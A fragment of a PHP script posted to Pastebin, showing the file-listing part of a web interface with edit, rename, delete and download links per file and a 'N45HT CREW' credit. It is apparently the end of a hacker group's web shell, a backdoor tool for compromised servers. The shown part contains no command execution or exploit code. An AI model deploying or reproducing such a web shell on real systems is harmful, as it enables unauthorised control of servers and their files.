  2900.             } else {
  2901.                 $size = $size. 'KB';
  2902.             }
  2903.             if(!is_file("$dir/$file")) continue;
  2904.             echo "<tr>";
  2905.             echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/ziggy19/adobe-cc-tilt-rectangle/24/Adobe-Me-icon.png'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2906.             echo "<td class='td_home'><center>$ftype</center></td>";
  2907.             echo "<td class='td_home'><center>$size</center></td>";
  2908.             echo "<td class='td_home'><center>$ftime</center></td>";
  2909.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2910.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2911.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2912.             echo "</tr>";
  2913.         }
  2914.         echo "</table>";
  2915.         if(!is_readable($dir)) {
  2916.             //
  2917.         } else {
  2918.             echo "<hr>";
  2919.         }
  2920.     echo "<center>Copyright @ ".date("Y")." - N45HT CREW</font></a></center>";
  2921. }
  2922. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top